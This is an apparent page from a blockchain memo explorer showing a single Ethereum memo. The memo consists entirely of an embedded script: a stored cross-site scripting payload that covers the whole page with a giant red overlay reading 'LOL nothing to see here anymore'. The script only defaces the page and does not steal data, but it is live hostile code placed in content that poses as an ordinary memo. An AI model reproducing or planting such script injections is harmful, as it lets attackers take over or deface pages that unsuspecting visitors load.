memoscan
← all memos

Memo 0xf7d7eec5…324afb on Ethereum

<script> let div = document.createElement("div"); div.style.minWidth = "10000000px"; div.style.minHeight = "10000000px"; div.style.top = "0px"; div.style.left = "0px"; div.style.zIndex = 2147483647; div.style.backgroundColor = "red"; div.style.position = "absolute"; div.innerHTML = "LOL nothing to see here anymore"; document.body.appendChild(div); </script>